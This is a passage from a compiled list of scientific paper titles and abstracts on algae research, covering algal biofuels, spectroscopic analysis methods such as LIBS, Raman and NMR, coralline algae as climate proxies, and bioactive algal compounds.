algae-specific distribution of high- and low-amplitude peaks in two dimensions. Species-specific pattern of MS intensities were readily discernable in terms of unique single spots of high amplitude MS-peaks which collect characteristic fingerprint spectra. The spot patterns allow the visual identification of groups of samples referring to different species, genotypes or isolates. The use of meta-peaks instead of single-peaks reduces the dimension of the data and leads to an increased discriminating power in downstream analysis. ::: ::: ::: CONCLUSIONS ::: We expect that our SOM portray method improves MS-based classifications and feature selection in upcoming applications of MALDI-typing based species identifications especially of closely related species. --- paper_title: Biofuels from algae: challenges and potential. paper_content: Algae biofuels may provide a viable alternative to fossil fuels; however, this technology must overcome a number of hurdles before it can compete in the fuel market and be broadly deployed. These challenges include strain identification and improvement, both in terms of oil productivity and crop protection, nutrient and resource allocation and use, and the production of co-products to improve the economics of the entire system. Although there is much excitement about the potential of algae biofuels, much work is still required in the field. In this article, we attempt to elucidate the major challenges to economic algal biofuels at scale, and improve the focus of the scientific community to address these challenges and move algal biofuels from promise to reality. --- paper_title: Establishment of a bioenergy-focused microalgal culture collection paper_content: Abstract A promising renewable energy scenario involves growing photosynthetic microalgae as a biofuel feedstock that can be converted into fungible, energy-dense fuels. Microalgae transform the energy in sunlight into a variety of reduced-carbon storage products, including triacylglycerols, which can be readily transformed into diesel fuel surrogates. To develop an economically viable algal biofuel industry, it is important to maximize the production and accumulation of these targeted bioenergy carriers in selected strains. In an effort to identify promising feedstock isolates we developed, evaluated and optimized contemporary high-throughput cell-sorting techniques to establish a collection of microalgae isolated from highly diverse ecosystems near geographic areas that are potential sites for large-scale algal cultivation in the Southwest United States. These efforts resulted in a culture collection containing 360 distinct microalgal strains. We report on the establishment of this collection and some preliminary qualitative screening studies to identify important biofuel phenotypes including neutral lipid accumulation and growth rates. As part of this undertaking we determined suitable cultivation media and evaluated cryopreservation techniques critical for the long-term storage of the microorganisms in this collection. This technique allows for the rapid isolation of extensive strain biodiversity that can be leveraged for the selection of promising bioenergy feedstock strains, as well as for providing fundamental advances in our understanding of fundamental algal biology. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part II: Review of Instrumental and Methodological Approaches to Material Analysis and Applications to Different Fields paper_content: The first part of this two-part review focused on the fundamental and diagnostics aspects of laser-induced plasmas, only touching briefly upon concepts such as sensitivity and detection limits and largely omitting any discussion of the vast panorama of the practical applications of the technique. Clearly a true LIBS community has emerged, which promises to quicken the pace of LIBS developments, applications, and implementations. With this second part, a more applied flavor is taken, and its intended goal is summarizing the current state-of-the-art of analytical LIBS, providing a contemporary snapshot of LIBS applications, and highlighting new directions in laser-induced breakdown spectroscopy, such as novel approaches, instrumental developments, and advanced use of chemometric tools. More specifically, we discuss instrumental and analytical approaches (e.g., double- and multi-pulse LIBS to improve the sensitivity), calibration-free approaches, hyphenated approaches in which techniques such as Raman and fluorescence are coupled with LIBS to increase sensitivity and information power, resonantly enhanced LIBS approaches, signal processing and optimization (e.g., signal-to-noise analysis), and finally applications. An attempt is made to provide an updated view of the role played by LIBS in the various fields, with emphasis on applications considered to be unique. We finally try to assess where LIBS is going as an analytical field, where in our opinion it should go, and what should still be done for consolidating the technique as a mature method of chemical analysis. --- paper_title: Determination of the total unsaturation in oils and margarines by fourier transform raman spectroscopy paper_content: An improved Raman spectroscopic procedure for the determination of the total unsaturation in oils and fats using Fourier Transform Raman (FT-Raman) spectroscopy is described. An important advantage of FT-Raman for these samples is that the spectra are fluorescence-free unlike dispersive Raman which often uses visible excitation. Samples can be analyzed without any pre-treatment thus eliminating the need for dissolution in toxic solvents. The short acquisition time of FT-Raman and the ease of application allowed for a rapid sample turnover. --- paper_title: Bioactive compounds from cyanobacteria and microalgae: an overview. paper_content: Cyanobacteria (blue-green algae) are photosynthetic prokaryotes used as food by humans. They have also been recognized as an excellent source of vitamins and proteins and as such are found in health food stores throughout the world. They are also reported to be a source of fine chemicals, renewable fuel and bioactive compounds. This potential is being realized as data from research in the areas of the physiology and chemistry of these organisms are gathered and the knowledge of cyanobacterial genetics and genetic engineering increased. Their role as antiviral, anti-tumour, antibacterial, anti-HIV and a food additive have been well established. The production of cyanobacteria in artificial and natural environments has been fully exploited. In this review the use of cyanobacteria and microalgae, production processes and biosynthesis of pigments, colorants and certain bioactive compounds are discussed in detail. The genetic manipulation of cyanobacteria and microalgae to improve their quality are also described at length. --- paper_title: A review of the biochemistry of heavy metal biosorption by brown algae. paper_content: The passive removal of toxic heavy metals such as Cd(2+), Cu(2+), Zn(2+), Pb(2+), Cr(3+), and Hg(2+) by inexpensive biomaterials, termed biosorption, requires that the substrate displays high metal uptake and selectivity, as well as suitable mechanical properties for applied remediation scenarios. In recent years, many low-cost sorbents have been investigated, but the brown algae have since proven to be the most effective and promising substrates. It is their basic biochemical constitution that is responsible for this enhanced performance among biomaterials. More specifically, it is the properties of cell wall constituents, such as alginate and fucoidan, which are chiefly responsible for heavy metal chelation. In this comprehensive review, the emphasis is on outlining the biochemical properties of the brown algae that set them apart from other algal biosorbents. A detailed description of the macromolecular conformation of the alginate biopolymer is offered in order to explain the heavy metal selectivity displayed by the brown algae. The role of cellular structure, storage polysaccharides, cell wall and extracellular polysaccharides is evaluated in terms of their potential for metal sequestration. Binding mechanisms are discussed, including the key functional groups involved and the ion-exchange process. Quantification of metal-biomass interactions is fundamental to the evaluation of potential implementation strategies, hence sorption isotherms, ion-exchange constants, as well as models used to characterize algal biosorption are reviewed. The sorption behavior (i.e., capacity, affinity) of brown algae with various heavy metals is summarized and their relative performance is evaluated. --- paper_title: Spectroscopic analysis using a hybrid LIBS-Raman system paper_content: A novel setup, combining two spectroscopic techniques, laser induced breakdown spectroscopy (LIBS) and Raman spectroscopy in a hybrid unit, is described. The work presented herein is part of a broader project that aims to demonstrate the applicability of the hybrid LIBS-Raman unit as an analytical tool for the investigation of samples and objects of cultural heritage. The system utilizes a nanosecond pulsed Nd:YAG laser (532 nm) for both LIBS and Raman analysis. In the Raman mode, a low intensity beam from the laser probes the sample surface and the scattering signal is collected into a grating spectrograph coupled to an intensified charge-coupled device (ICCD) detector, which records the Raman spectrum. In the LIBS mode a single high intensity pulse from the laser irradiates the sample surface and the time- and spectrally-resolved emission from the resulting laser ablation plume yields the LIBS spectrum. The use of a non-gated CCD detector was found to produce similar quality data (in terms of S/N ratio and fluorescence background) in the Raman mode, while in the LIBS mode spectral features were clearly broader but did not prevent identification of prominent atomic emission lines. Several model pigment samples were examined and the data obtained show the ability of the hybrid unit to record both Raman and LIBS spectra from the same point on the sample, a clear advantage over the use of different analytical setups. --- paper_title: Optimization of outdoor cultivation in flat panel airlift reactors for lipid production by Chlorella vulgaris. paper_content: Microalgae are discussed as a potential renewable feedstock for biofuel production. The production of highly concentrated algae biomass with a high fatty acid content, accompanied by high productivity with the use of natural sunlight is therefore of great interest. In the current study an outdoor pilot plant with five 30 L Flat Panel Airlift reactors (FPA) installed southwards were operated in 2011 in Stuttgart, Germany. The patented FPA reactor works on the basis of an airlift loop reactor and offers efficient intermixing for homogeneous light distribution. A lipid production process with the microalgae Chlorella vulgaris (SAG 211-12), under nitrogen and phosphorous deprivation, was established and evaluated in regard to the fatty acid content, fatty acid productivity and light yield. In the first set of experiments limitations caused by restricted CO₂ availability were excluded by enriching the media with NaOH. The higher alkalinity allows a higher CO₂ content of supplied air and leads to doubling of fatty acid productivity. The second set of experiments focused on how the ratio of light intensity to biomass concentration in the reactor impacts fatty acid content, productivity and light yield. The specific light availability was specified as mol photons on the reactor surface per gram biomass in the reactor. This is the first publication based on experimental data showing the quantitative correlation between specific light availability, fatty acid content and biomass light yield for a lipid production process under nutrient deprivation and outdoor conditions. High specific light availability leads to high fatty acid contents. Lower specific light availability increases fatty acid productivity and biomass light yield. An average fatty acid productivity of 0.39 g L⁻¹ day⁻¹ for a 12 days batch process with a final fatty acid content of 44.6% [w/w] was achieved. Light yield of 0.4 g mol photons⁻¹ was obtained for the first 6 days of cultivation. --- paper_title: High-resolution Mg/Ca ratios in a coralline red alga as a proxy for Bering Sea temperature variations from 1902 to 1967 paper_content: We present the first continuous, high-resolution record of Mg/Ca variations within an encrusting coralline red alga, Clathromorphum nereostratum, from Amchitka Island, Aleutian Islands. Mg/Ca ratios of individual growth increments were analyzed by measuring a singlepoint, electron-microprobe transect, yielding a resolution of ~15 samples/year and a 65-year record (1902–1967) of variations. Results show that Mg/Ca ratios in the high-Mg calcite algal framework display ::: pronounced annual cyclicity and archive late spring–late fall sea-surface temperatures (SST) corresponding to the main season of algal growth. Mg/Ca values correlate well to local SST, as well as to an air temperature record from the same region. High spatial correlation to large-scale SST variability in the subarctic North Pacific is observed, with patterns of strongest correlation following the direction of major oceanographic features that play a key role in the exchange of water masses between the North Pacific and the Bering Sea. Our data correlate well with a shorter Mg/Ca record from ability of the alga to reliably record regional environmental signals. In addition, Mg/Ca ratios relate well to a 29-year δ18O time series measured on the same sample, providing additional support for the use of Mg in coralline red algae as a paleotemperature proxy that, unlike algal-δ18O, is not influenced by salinity fluctuations. Moreover, electron microprobe–based analysis enables higher sampling resolution and faster analysis, thus providing a promising approach for future studies of longer C. nereostratum records and applications to other coralline species. --- paper_title: A combined laser-induced breakdown and Raman spectroscopy Echelle system for elemental and molecular microanalysis paper_content: Abstract Raman and laser-induced breakdown spectroscopy is integrated into a single system for molecular and elemental microanalyses. Both analyses are performed on the same ~ 0.002 mm 2 sample spot allowing the assessment of sample heterogeneity on a micrometric scale through mapping and scanning. The core of the spectrometer system is a novel high resolution dual arm Echelle spectrograph utilized for both techniques. In contrast to scanning Raman spectroscopy systems, the Echelle–Raman spectrograph provides a high resolution spectrum in a broad spectral range of 200–6000 cm − 1 without moving the dispersive element. The system displays comparable or better sensitivity and spectral resolution in comparison to a state-of-the-art scanning Raman microscope and allows short analysis times for both Raman and laser induced breakdown spectroscopy. The laser-induced breakdown spectroscopy performance of the system is characterized by ppm detection limits, high spectral resolving power (15,000), and broad spectral range (290–945 nm). The capability of the system is demonstrated with the mapping of heterogeneous mineral samples and layer by layer analysis of pigments revealing the advantages of combining the techniques in a single unified set-up. --- paper_title: In vivo NMR studies of higher plants and algae paper_content: Publisher Summary This chapter discusses in vivo nuclear magnetic resonance (NMR) studies of higher plants and algae. As the opportunity arose for biologists to apply the emerging techniques of NMR spectroscopy to systems of biological interest, it was perhaps inevitable that they would first use NMR to study the properties of water in cells and tissues. The advantages of studying the water non-invasively, in an unperturbed system, were apparently only partly offset by the problems of interpretation that arose from the heterogeneity of living systems and a considerable literature developed in this field. High-resolution multinuclear NMR spectroscopy permits the detection of certain ions and metabolites in vivo , as well as the tissue water, and thus increases the potential enormously for tackling biochemical and physiological problems non-invasively; while NMR imaging, although still relying on the detection of the water signal, provides a method for mapping the spatial distribution of the water in the sample. The potential importance of these techniques to biologists and physiologists meant that their interests and requirements began to be reflected in the design of NMR equipment and this accelerated the application of the new techniques to physiological problems. In vivo NMR studies have always emphasized the non-invasive character of the investigation and the chapter illustrates how this important property is exploited in studies of higher plants and algae. --- paper_title: Anti-HIV Activity of Extracts and Compounds from Marine Algae paper_content: Abstract In recent years, elucidation of novel bioactive substances from different marine organisms is gaining importance rapidly not only from the research and publications but also from controlled clinical studies of natural product-derived substances. They offer important leads for the development of antiviral drugs against viral infections caused by human immunodeficiency virus type 1 (HIV-1). Regarding this issue, numerous anti-HIV-1 therapeutic agents from marine resources have been reported for their potential medicine/medical application as novel functional ingredients in anti-HIV therapy. In detail, marine macroalgae have attracted much of attention as a reliable source for potential anti-HIV compounds. Up to date, several types of compounds such as tannins, polysaccharides, lectins, and derivatives have been isolated, identified, and reported to possess significant anti-HIV-1 activity. --- paper_title: Enhancing biomass energy yield from pilot-scale high rate algal ponds with recycling. paper_content: This paper investigates the effect of recycling on biomass energy yield in High Rate Algal Ponds (HRAPs). Two 8 m(3) pilot-scale HRAPs treating primary settled sewage were operated in parallel and monitored over a 2-year period. Volatile suspended solids were measured from both HRAPs and their gravity settlers to determine biomass productivity and harvest efficiency. The energy content of the biomass was also measured. Multiplying biomass productivity and harvest efficiency gives the 'harvestable biomass productivity' and multiplying this by the energy content defines the actual 'biomass energy yield'. In Year 1, algal recycling was implemented in one of the ponds (HRAPr) and improved harvestable biomass productivity by 58% compared with the control (HRAPc) without recycling (HRAPr: 9.2 g/m(2)/d; HRAPc: 5.8 g/m(2)/d). The energy content of the biomass grown in HRAPr, which was dominated by Pediastrun boryanum, was 25% higher than the control HRAPc which contained a mixed culture of 4-5 different algae (HRAPr: 21.5 kJ/g; HRAPc: 18.6 kJ/g). In Year 2, HRAPc was then seeded with the biomass harvested from the P. boryanum dominated HRAPr. This had the effect of shifting algal dominance from 89% Dictyosphaerium sp. (which is poorly-settleable) to over 90% P. boryanum in 5 months. Operation of this pond was then switched to recycling its own harvested biomass, which maintained P. boryanum dominance for the rest of Year 2. This result confirms, for the first time in the literature, that species control is possible for similarly sized co-occurring algal colonies in outdoor HRAP by algal recycling. With regard to the overall improvement in biomass energy yield, which is a critical parameter in the context of algal cultivation for biofuels, the combined improvements that recycling triggered in biomass productivity, harvest efficiency and energy content enhanced the harvested biomass energy yield by 66% (HRAPr: 195 kJ/m(2)/day; HRAPc: 118 kJ/m(2)/day). --- paper_title: Microalgae as a raw material for biofuels production paper_content: Biofuels demand is unquestionable in order to reduce gaseous emissions (fossil CO(2), nitrogen and sulfur oxides) and their purported greenhouse, climatic changes and global warming effects, to face the frequent oil supply crises, as a way to help non-fossil fuel producer countries to reduce energy dependence, contributing to security of supply, promoting environmental sustainability and meeting the EU target of at least of 10% biofuels in the transport sector by 2020. Biodiesel is usually produced from oleaginous crops, such as rapeseed, soybean, sunflower and palm. However, the use of microalgae can be a suitable alternative feedstock for next generation biofuels because certain species contain high amounts of oil, which could be extracted, processed and refined into transportation fuels, using currently available technology; they have fast growth rate, permit the use of non-arable land and non-potable water, use far less water and do not displace food crops cultures; their production is not seasonal and they can be harvested daily. The screening of microalgae (Chlorella vulgaris, Spirulina maxima, Nannochloropsis sp., Neochloris oleabundans, Scenedesmus obliquus and Dunaliella tertiolecta) was done in order to choose the best one(s), in terms of quantity and quality as oil source for biofuel production. Neochloris oleabundans (fresh water microalga) and Nannochloropsis sp. (marine microalga) proved to be suitable as raw materials for biofuel production, due to their high oil content (29.0 and 28.7%, respectively). Both microalgae, when grown under nitrogen shortage, show a great increase (approximately 50%) in oil quantity. If the purpose is to produce biodiesel only from one species, Scenedesmus obliquus presents the most adequate fatty acid profile, namely in terms of linolenic and other polyunsaturated fatty acids. However, the microalgae Neochloris oleabundans, Nannochloropsis sp. and Dunaliella tertiolecta can also be used if associated with other microalgal oils and/or vegetable oils. --- paper_title: Constraints to commercialization of algal fuels. paper_content: Production of algal crude oil has been achieved in various pilot scale facilities, but whether algal fuels can be produced in sufficient quantity to meaningfully displace petroleum fuels, has been largely overlooked. Limitations to commercialization of algal fuels need to be understood and addressed for any future commercialization. This review identifies the major constraints to commercialization of transport fuels from microalgae. Algae derived fuels are expensive compared to petroleum derived fuels, but this could change. Unfortunately, improved economics of production are not sufficient for an environmentally sustainable production, or its large scale feasibility. A low-cost point supply of concentrated carbon dioxide colocated with the other essential resources is necessary for producing algal fuels. An insufficiency of concentrated carbon dioxide is actually a major impediment to any substantial production of algal fuels. Sustainability of production requires the development of an ability to almost fully recycle the phosphorous and nitrogen nutrients that are necessary for algae culture. Development of a nitrogen biofixation ability to support production of algal fuels ought to be an important long term objective. At sufficiently large scale, a limited supply of freshwater will pose a significant limitation to production even if marine algae are used. Processes for recovering energy from the algal biomass left after the extraction of oil, are required for achieving a net positive energy balance in the algal fuel oil. The near term outlook for widespread use of algal fuels appears bleak, but fuels for niche applications such as in aviation may be likely in the medium term. Genetic and metabolic engineering of microalgae to boost production of fuel oil and ease its recovery, are essential for commercialization of algal fuels. Algae will need to be genetically modified for improved photosynthetic efficiency in the long term. --- paper_title: Optimization of light use efficiency for biofuel production in algae. paper_content: A major challenge for next decades is development of competitive renewable energy sources, highly needed to compensate fossil fuels reserves and reduce greenhouse gas emissions. Among different possibilities, which are currently under investigation, there is the exploitation of unicellular algae for production of biofuels and biodiesel in particular. Some algae species have the ability of accumulating large amount of lipids within their cells which can be exploited as feedstock for the production of biodiesel. Strong research efforts are however still needed to fulfill this potential and optimize cultivation systems and biomass harvesting. Light provides the energy supporting algae growth and available radiation must be exploited with the highest possible efficiency to optimize productivity and make microalgae large scale cultivation energetically and economically sustainable. Investigation of the molecular bases influencing light use efficiency is thus seminal for the success of this biotechnology. In this work factors influencing light use efficiency in algal biomass production are reviewed, focusing on how algae genetic engineering and control of light environment within photobioreactors can improve the productivity of large scale cultivation systems. --- paper_title: Coralline algal growth-increment widths archive North Atlantic climate variability paper_content: Over the past decade coralline algae have increasingly been used as archives of paleoclimate information. Encrusting coralline algae, which deposit annual growth increments in a high Mg-calcite skeleton, are amongst the longest-lived shallow marine organisms. In fact, a live-collected plant has recently been shown to have lived for at least 850 years based on radiometric dating. While a number of investigations have successfully used geochemical information of coralline algal skeletons to reconstruct sea surface temperatures, less attention has been paid to employ growth increment widths as a temperature proxy. Here we explore the relationship between growth and environmental parameters in Clathromorphum compactum collected in the subarctic Northwestern Atlantic. Results indicate that growth-increment widths of individual plants are poorly correlated with instrumental sea surface temperatures (SST). However, an averaged record of multiple growth increment-width time series from a regional network of C. compactum specimens up to 800 km apart reveals strong correlations with annual instrumental SST since 1950. Hence, similar to methods applied in dendrochronology, averaging of multiple sclerochronological records of coralline algae provides accurate climate information. A 115-year growth-increment width master chronology created from modern-collected and museum specimens is highly correlated to multidecadal variability seen in North Atlantic sea surface temperatures. Positive changes in algal growth anomalies record the well-documented regime shift and warming in the northwestern Atlantic during the 1990s. Large positive changes in algal growth anomalies were also present in the 1920s and 1930s, indicating that the impact of a concurrent large-scale regime shift throughout the North Atlantic was more strongly felt in the subarctic Northwestern Atlantic than previously thought, and may have even exceeded the 1990s event with respect to the magnitude of the warming. --- paper_title: Structural similarities of fucoidans from brown algae Silvetia babingtonii and Fucus evanescens, determined by tandem MALDI-TOF mass spectrometry. paper_content: Rapid mass spectrometric investigation of oligosaccharides, obtained by autohydrolysis of fucoidans from brown algae Silvetia babingtonii and Fucus evanescens (Fucales, Phaeophyceae) has shown both similarities and differences in structural features/sulfation pattern of their fragments, obtained in the same conditions. Tandem MALDI-TOF MS of fucooligosaccharides with even DP (degree of polymerization) was close to that observed for fucoidan from F. evanescens. Slight differences in tandem mass spectra of fragments with odd DP indicated, probably, sulfation at C-3 (instead of C-2 in F. evanescens) of some (1→4)-linked α-L-Fucp residues and/or the presence of short blocks, built up of (1→3)-linked α-L-Fucp residues. --- paper_title: Lipid extracts from different algal species:1H and13C-NMR spectroscopic studies as a new tool to screen differences in the composition of fatty acids, sterols and carotenoids paper_content: One- and two-dimensional1H- and13C-NMR spectra of lipid extracts fromUlva rigida, Gracilaria longa, Fucus virsoides andCodium tomentosum collected in the northern Adriatic Sea allowed screening of the content of fatty acid chains, carotenoids, free and acylated cholesterol and chlorophylls. The carotenoid-to-polyunsaturated fatty acid molar ratio was taken as a comparison parameter in samples ofUlva rigida collected in differentloci and seasons; the value was markedly higher in samples from the Lagoon of Venice than from marine coastal waters. The total cholesterol concentration was evaluated by1H-NMR spectroscopy and similar values were found for all species. Two-dimensional heterocorrelated NMR spectroscopy was shown to give characteristic fingerprints of the lipid extracts from algal samples as regards the content in chlorophylls, unsaturated fatty acids and carotenoids. --- paper_title: Engineering challenges in biodiesel production from microalgae. paper_content: In recent years, the not too distant exhaustion of fossil fuels is becoming apparent. Apart from this, the combustion of fossil fuels leads to environmental concerns, the emission of greenhouse gases and issues with global warming and health problems. Production of biodiesel from microalgae may represent an attractive solution to the above mentioned problems, and can offer a renewable source of fuel with fewer pollutants. This review presents a compilation of engineering challenges related to microalgae as a source of biodiesel. Advantages and current limitations for biodiesel production are discussed; some aspects of algae cells biology, with emphasis on cell wall composition, as it represents a barrier for fatty acid extraction and lipid droplets are also presented. In addition, recent advances in the different stages of the manufacturing process are included, starting from the strain selection and finishing in the processing of fatty acids into biodiesel. --- paper_title: Wastewater treatment high rate algal ponds for biofuel production. paper_content: Abstract While research and development of algal biofuels are currently receiving much interest and funding, they are still not commercially viable at today’s fossil fuel prices. However, a niche opportunity may exist where algae are grown as a by-product of high rate algal ponds (HRAPs) operated for wastewater treatment. In addition to significantly better economics, algal biofuel production from wastewater treatment HRAPs has a much smaller environmental footprint compared to commercial algal production HRAPs which consume freshwater and fertilisers. In this paper the critical parameters that limit algal cultivation, production and harvest are reviewed and practical options that may enhance the net harvestable algal production from wastewater treatment HRAPs including CO 2 addition, species control, control of grazers and parasites and bioflocculation are discussed. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Use of LIDAR in landslide investigations: a review paper_content: This paper presents a short history of the appraisal of laser scanner technologies in geosciences used for imaging relief by high-resolution digital elevation models (HRDEMs) or 3D models. A general overview of light detection and ranging (LIDAR) techniques applied to landslides is given, followed by a review of different applications of LIDAR for landslide, rockfall and debris-flow. These applications are classified as: (1) Detection and characterization of mass movements; (2) Hazard assessment and susceptibility mapping; (3) Modelling; (4) Monitoring. This review emphasizes how LIDAR-derived HRDEMs can be used to investigate any type of landslides. It is clear that such HRDEMs are not yet a common tool for landslides investigations, but this technique has opened new domains of applications that still have to be developed. --- paper_title: Coralline algal Barium as indicator for 20th century northwestern North Atlantic surface ocean freshwater variability paper_content: During the past decades climate and freshwater dynamics in the northwestern North Atlantic have undergone major changes. Large-scale freshening episodes, related to polar freshwater pulses, have had a strong influence on ocean variability in this climatically important region. However, little is known about variability before 1950, mainly due to the lack of long-term high-resolution marine proxy archives. Here we present the first multidecadal-length records of annually resolved Ba/Ca variations from Northwest Atlantic coralline algae. We observe positive relationships between algal Ba/Ca ratios from two Newfoundland sites and salinity observations back to 1950. Both records capture episodical multi-year freshening events during the 20th century. Variability in algal Ba/Ca is sensitive to freshwater-induced changes in upper ocean stratification, which affect the transport of cold, Ba-enriched deep waters onto the shelf (highly stratified equals less Ba/Ca). Algal Ba/Ca ratios therefore may serve as a new resource for reconstructing past surface ocean freshwater changes. --- paper_title: Anticancer compounds from marine macroalgae and their application as medicinal foods. paper_content: Cancer is one of the most challenging medical conditions that need a proper therapeutic approach for its proper management with fewer side effects. Until now, many of the phytochemicals from terrestrial origin have been assessed for their anticancer ability and few of them are in clinical trials too. However, marine environment also has been a greatest resource that harbors taxonomically diverse and a variety of life forms and serves as store house for several biologically beneficial metabolites. Hitherto, many metabolites have been isolated from marine biomasses that have exhibited excellent biological activities, especially as anticancer agents. In particular, marine macroalgae which are considered as dietary constituents in Pacific Asian region have become chief resources for their unparalleled and unique metabolites like sulfated polysaccharides (SPs), phlorotannins, and their ability in reducing the risk of cancer and its related diseases. In this chapter, we have discussed the anticancer activities of marine algae-derived SPs, phlorotannins, and carotenoids and the possibilities of marine algae as potential medicinal foods in the management of cancer. --- paper_title: Use of algae as biofuel sources paper_content: The aim of this study is to investigate the algae production technologies such as open, closed and hybrid systems, production costs, and algal energy conversions. Liquid biofuels are alternative fuels promoted with potential to reduce dependence on fossil fuel imports. Biofuels production costs can vary widely by feedstock, conversion process, scale of production and region. Algae will become the most important biofuel source in the near future. Microalgae appear to be the only source of renewable biodiesel that is capable of meeting the global demand for transport fuels. Microalgae can be converted to bio-oil, bioethanol, bio-hydrogen and bimethane via thermochemical and biochemical methods. Microalgae are theoretically very promising source of biodiesel. --- paper_title: Sustainability of algal biofuel production using integrated renewable energy park (IREP) and algal biorefinery approach paper_content: Algal biomass can provide viable third generation feedstock for liquid transportation fuel. However, for a mature commercial industry to develop, sustainability as well as technological and economic issues pertinent to algal biofuel sector must be addressed first. This viewpoint focuses on three integrated approaches laid out to meet these challenges. Firstly, an integrated algal biorefinery for sequential biomass processing for multiple high-value products is delineated to bring in the financial sustainability to the algal biofuel production units. Secondly, an integrated renewable energy park (IREP) approach is proposed for amalgamating various renewable energy industries established in different locations. This would aid in synergistic and efficient electricity and liquid biofuel production with zero net carbon emissions while obviating numerous sustainability issues such as productive usage of agricultural land, water, and fossil fuel usage. A 'renewable energy corridor' rich in multiple energy sources needed for algal biofuel production for deploying IREPs in the United States is also illustrated. Finally, the integration of various industries with algal biofuel sector can bring a multitude of sustainable deliverables to society, such as renewable supply of cheap protein supplements, health products and aquafeed ingredients. The benefits, challenges, and policy needs of the IREP approach are also discussed. --- paper_title: Optical Algal Biosensor using Alkaline Phosphatase for Determination of Heavy Metals paper_content: A biosensor is constructed to detect heavy metals from inhibition of alkaline phosphatase (AP) present on the external membrane of Chlorella vulgaris microalgae. The microalgal cells are immobilized on removable membranes placed in front of the tip of an optical fiber bundle inside a homemade microcell. C. vulgaris was cultivated in the laboratory and its alkaline phosphatase activity is strongly inhibited in the presence of heavy metals. This property has been used for the determination of those toxic compounds. --- paper_title: Comparing several atomic spectrometric methods to the super stars: special emphasis on laser induced breakdown spectrometry, LIBS, a future super star paper_content: The “super stars” of analytical atomic spectrometry are electrothermal atomization-atomic absorption spectrometry (ETA-AAS), inductively coupled plasma-atomic emission spectrometry (ICP-AES) and inductively coupled plasma-mass spectrometry (ICP-MS). Many other atomic spectrometric methods have been used to determine levels of elements present in solid, liquid and gaseous samples, but in most cases these other methods are inferior to the big three super star methods. The other atomic methods include glow discharge emission, absorption and mass spectrometric methods, laser excited fluorescence emission and ionization methods, and flame and microwave plasma emission and mass spectrometric methods. These “lesser” methods will be compared to the “super star” methods based on a number of figures of merit, including detection power, selectivity, multi-element capability, cost, applications, and “age” of the methods. The “age” of the method will be determined by a modification of the well-known Laitinen “Seven Ages of an Analytical Method” ::: (H.A. Laitinen, Anal. Chem., 1973, 45, 2305). Calculations will show that certain methods are capable of single atom detection, including several atomic absorption methods, as well as laser atomic ionization and fluorescence methods. The comparison of methods will indicate why the “super stars” of atomic spectrometric methods will continue to retain their status and what must be done for the lesser atomic methods to approach “super star” status. Certainly most of the lesser atomic spectrometric methods will have a limited place in the analytical arena. Because of the wide current interest and research activity, special emphasis will be placed on the technique of laser induced breakdown spectrometry (LIBS). Its current status and future developments will therefore be reviewed. --- paper_title: Potential for green microalgae to produce hydrogen, pharmaceuticals and other high value products in a combined process paper_content: Green microalgae for several decades have been produced for commercial exploitation, with applications ranging from health food for human consumption, aquaculture and animal feed, to coloring agents, cosmetics and others. Several products from green algae which are used today consist of secondary metabolites that can be extracted from the algal biomass. The best known examples are the carotenoids astaxanthin and β-carotene, which are used as coloring agents and for health-promoting purposes. Many species of green algae are able to produce valuable metabolites for different uses; examples are antioxidants, several different carotenoids, polyunsaturated fatty acids, vitamins, anticancer and antiviral drugs. In many cases, these substances are secondary metabolites that are produced when the algae are exposed to stress conditions linked to nutrient deprivation, light intensity, temperature, salinity and pH. In other cases, the metabolites have been detected in algae grown under optimal conditions, and little is known about optimization of the production of each product, or the effects of stress conditions on their production. Some green algae have shown the ability to produce significant amounts of hydrogen gas during sulfur deprivation, a process which is currently studied extensively worldwide. At the moment, the majority of research in this field has focused on the model organism, Chlamydomonas reinhardtii, but other species of green algae also have this ability. Currently there is little information available regarding the possibility for producing hydrogen and other valuable metabolites in the same process. This study aims to explore which stress conditions are known to induce the production of different valuable products in comparison to stress reactions leading to hydrogen production. Wild type species of green microalgae with known ability to produce high amounts of certain valuable metabolites are listed and linked to species with ability to produce hydrogen during general anaerobic conditions, and during sulfur deprivation. Species used today for commercial purposes are also described. This information is analyzed in order to form a basis for selection of wild type species for a future multi-step process, where hydrogen production from solar energy is combined with the production of valuable metabolites and other commercial uses of the algal biomass. --- paper_title: Dual role of microalgae: Phycoremediation of domestic wastewater and biomass production for sustainable biofuels production paper_content: Global threats of fuel shortages in the near future and climate change due to green-house gas emissions are posing serious challenges and hence and it is imperative to explore means for sustainable ways of averting the consequences. The dual application of microalgae for phycoremediation and biomass production for sustainable biofuels production is a feasible option. The use of high rate algal ponds (HRAPs) for nutrient removal has been in existence for some decades though the technology has not been fully harnessed for wastewater treatment. Therefore this paper discusses current knowledge regarding wastewater treatment using HRAPs and microalgal biomass production techniques using wastewater streams. The biomass harvesting methods and lipid extraction protocols are discussed in detail. Finally the paper discusses biodiesel production via transesterification of the lipids and other biofuels such as biomethane and bioethanol which are described using the biorefinery approach. --- paper_title: Potential of Near-Infrared Fourier Transform Raman Spectroscopy in Food Analysis paper_content: The 1064-nm excited Fourier transform (FT) Raman spectra have been measured in situ for various foods in order to investigate the potential of near-infrared (NIR) FT-Raman spectroscopy in food analysis. It is demonstrated here that NIR FT-Raman spectroscopy is a very powerful technique for (1) detecting selectively the trace components in 